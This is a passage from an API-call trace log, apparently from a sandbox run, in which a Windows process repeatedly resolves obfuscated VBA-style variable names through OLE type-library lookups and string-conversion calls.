ppTypeComp=0x31004300000000, pDummy=0x0) returned 0x0 [0069.407] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b808fa | out: _Dst=0x144ec0) returned 0x0 [0069.407] ITypeComp:RemoteBind (in: This=0x665ba60, szName="ucAQwB_X", lHashVal=0x1051e1, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b808ce, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="ucAQwB_X") returned 9 [0069.407] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="ucAQwB_X", lHashVal=0x1051e1, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b808ce, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="ucAQwB_X") returned 9 [0069.407] ITypeComp:RemoteBind (in: This=0x665bd30, szName="ucAQwB_X", lHashVal=0x1051e1, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.407] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ucAQwB_X") returned 0x1051e1 [0069.407] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="ucAQwB_X" | out: _Dst="ucAQwB_X") returned 0x0 [0069.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="ucAQwB_X") returned 9 [0069.407] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.407] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="ucAQwB_X", lHashVal=0x1051e1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.407] IUnknown:Release (This=0x665ba50) returned 0xd [0069.407] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.407] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="ucAQwB_X", lHashVal=0x1051e1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.408] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.408] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.408] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="ucAQwB_X", lHashVal=0x1051e1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.408] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.408] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.408] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="ucAQwB_X", lHashVal=0x1051e1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.408] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b808ce, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="ucAQwB_X") returned 9 [0069.408] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="ucAQwB_X", lHashVal=0x1051e1, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.408] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.408] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b808ce | out: _Dst=0x67c2d40) returned 0x0 [0069.408] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_ucAQwB_X") returned 0x10296a [0069.408] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_ucAQwB_X" | out: _Dst="_B_var_ucAQwB_X") returned 0x0 [0069.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_ucAQwB_X") returned 16 [0069.408] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.408] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_ucAQwB_X", lHashVal=0x10296a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.408] IUnknown:Release (This=0x665ba50) returned 0xd [0069.408] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.408] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_ucAQwB_X", lHashVal=0x10296a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.408] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.408] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.408] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_ucAQwB_X", lHashVal=0x10296a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.408] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.408] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.408] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_ucAQwB_X", lHashVal=0x10296a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.408] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.408] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.408] IUnknown:Release (This=0x665ba50) returned 0xd [0069.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1295e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_ucAQwB_X") returned 16 [0069.409] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_ucAQwB_X", lHashVal=0x10296a, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x75005f00720061, ppTypeComp=0x77005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x75005f00720061, ppTypeComp=0x77005100000000, pDummy=0x0) returned 0x0 [0069.409] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b808ce | out: _Dst=0x144ec0) returned 0x0 [0069.409] ITypeComp:RemoteBind (in: This=0x665ba60, szName="UAAXoBC", lHashVal=0x107cd1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8094e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="UAAXoBC") returned 8 [0069.409] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="UAAXoBC", lHashVal=0x107cd1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8094e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="UAAXoBC") returned 8 [0069.409] ITypeComp:RemoteBind (in: This=0x665bd30, szName="UAAXoBC", lHashVal=0x107cd1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.409] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UAAXoBC") returned 0x107cd1 [0069.409] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="UAAXoBC" | out: _Dst="UAAXoBC") returned 0x0 [0069.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="UAAXoBC") returned 8 [0069.409] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.409] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="UAAXoBC", lHashVal=0x107cd1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.409] IUnknown:Release (This=0x665ba50) returned 0xd [0069.409] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.409] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="UAAXoBC", lHashVal=0x107cd1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.409] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.409] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.409] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="UAAXoBC", lHashVal=0x107cd1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.409] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.409] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.409] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="UAAXoBC", lHashVal=0x107cd1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.410] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8094e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="UAAXoBC") returned 8 [0069.410] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="UAAXoBC", lHashVal=0x107cd1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.410] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.410] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b8094e | out: _Dst=0x67c2d40) returned 0x0 [0069.410] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_UAAXoBC") returned 0x1070d4 [0069.410] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_UAAXoBC" | out: _Dst="_B_var_UAAXoBC") returned 0x0 [0069.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_UAAXoBC") returned 15 [0069.410] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.410] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_UAAXoBC", lHashVal=0x1070d4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.410] IUnknown:Release (This=0x665ba50) returned 0xd [0069.410] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.410] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_UAAXoBC", lHashVal=0x1070d4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.410] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.410] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.410] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_UAAXoBC", lHashVal=0x1070d4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.410] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.410] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.410] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_UAAXoBC", lHashVal=0x1070d4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.410] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.410] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.410] IUnknown:Release (This=0x665ba50) returned 0xd [0069.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1298e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_UAAXoBC") returned 15 [0069.410] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_UAAXoBC", lHashVal=0x1070d4, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x55005f00720061, ppTypeComp=0x6f005800000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x55005f00720061, ppTypeComp=0x6f005800000000, pDummy=0x0) returned 0x0 [0069.410] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b8094e | out: _Dst=0x144ec0) returned 0x0 [0069.411] ITypeComp:RemoteBind (in: This=0x665ba60, szName="vDQB_D", lHashVal=0x104d18, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.411] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80976, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="vDQB_D") returned 7 [0069.411] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="vDQB_D", lHashVal=0x104d18, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.411] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80976, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="vDQB_D") returned 7 [0069.411] ITypeComp:RemoteBind (in: This=0x665bd30, szName="vDQB_D", lHashVal=0x104d18, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.411] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vDQB_D") returned 0x104d18 [0069.411] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="vDQB_D" | out: _Dst="vDQB_D") returned 0x0 [0069.411] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="vDQB_D") returned 7 [0069.411] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.411] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="vDQB_D", lHashVal=0x104d18, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.411] IUnknown:Release (This=0x665ba50) returned 0xd [0069.411] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.411] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="vDQB_D", lHashVal=0x104d18, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.411] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.411] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.411] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="vDQB_D", lHashVal=0x104d18, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.411] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.411] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.411] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="vDQB_D", lHashVal=0x104d18, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.411] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.411] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80976, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="vDQB_D") returned 7 [0069.411] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="vDQB_D", lHashVal=0x104d18, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.411] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.412] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b80976 | out: _Dst=0x67c2d40) returned 0x0 [0069.412] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_vDQB_D") returned 0x10c7c1 [0069.412] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_vDQB_D" | out: _Dst="_B_var_vDQB_D") returned 0x0 [0069.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_vDQB_D") returned 14 [0069.412] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.412] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_vDQB_D", lHashVal=0x10c7c1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.412] IUnknown:Release (This=0x665ba50) returned 0xd [0069.412] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.412] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_vDQB_D", lHashVal=0x10c7c1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.412] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.412] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.412] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_vDQB_D", lHashVal=0x10c7c1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.412] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.412] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.412] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_vDQB_D", lHashVal=0x10c7c1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.412] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.412] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.412] IUnknown:Release (This=0x665ba50) returned 0xd [0069.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b129be, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_vDQB_D") returned 14 [0069.412] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_vDQB_D", lHashVal=0x10c7c1, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x76005f00720061, ppTypeComp=0x5f004200000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x76005f00720061, ppTypeComp=0x5f004200000000, pDummy=0x0) returned 0x0 [0069.412] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b80976 | out: _Dst=0x144ec0) returned 0x0 [0069.412] ITypeComp:RemoteBind (in: This=0x665ba60, szName="WADcQGZ", lHashVal=0x103edb, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8099e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="WADcQGZ") returned 8 [0069.412] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="WADcQGZ", lHashVal=0x103edb, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8099e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="WADcQGZ") returned 8 [0069.413] ITypeComp:RemoteBind (in: This=0x665bd30, szName="WADcQGZ", lHashVal=0x103edb, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.413] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WADcQGZ") returned 0x103edb [0069.413] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="WADcQGZ" | out: _Dst="WADcQGZ") returned 0x0 [0069.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="WADcQGZ") returned 8 [0069.413] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.413] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="WADcQGZ", lHashVal=0x103edb, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.413] IUnknown:Release (This=0x665ba50) returned 0xd [0069.413] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.413] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="WADcQGZ", lHashVal=0x103edb, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.413] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.413] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.413] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="WADcQGZ", lHashVal=0x103edb, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.413] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.413] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.413] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="WADcQGZ", lHashVal=0x103edb, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.413] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8099e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="WADcQGZ") returned 8 [0069.413] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="WADcQGZ", lHashVal=0x103edb, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.413] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.413] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b8099e | out: _Dst=0x67c2d40) returned 0x0 [0069.413] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_WADcQGZ") returned 0x10425f [0069.413] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_WADcQGZ" | out: _Dst="_B_var_WADcQGZ") returned 0x0 [0069.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_WADcQGZ") returned 15 [0069.413] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.413] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_WADcQGZ", lHashVal=0x10425f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.413] IUnknown:Release (This=0x665ba50) returned 0xd [0069.414] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.414] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_WADcQGZ", lHashVal=0x10425f, 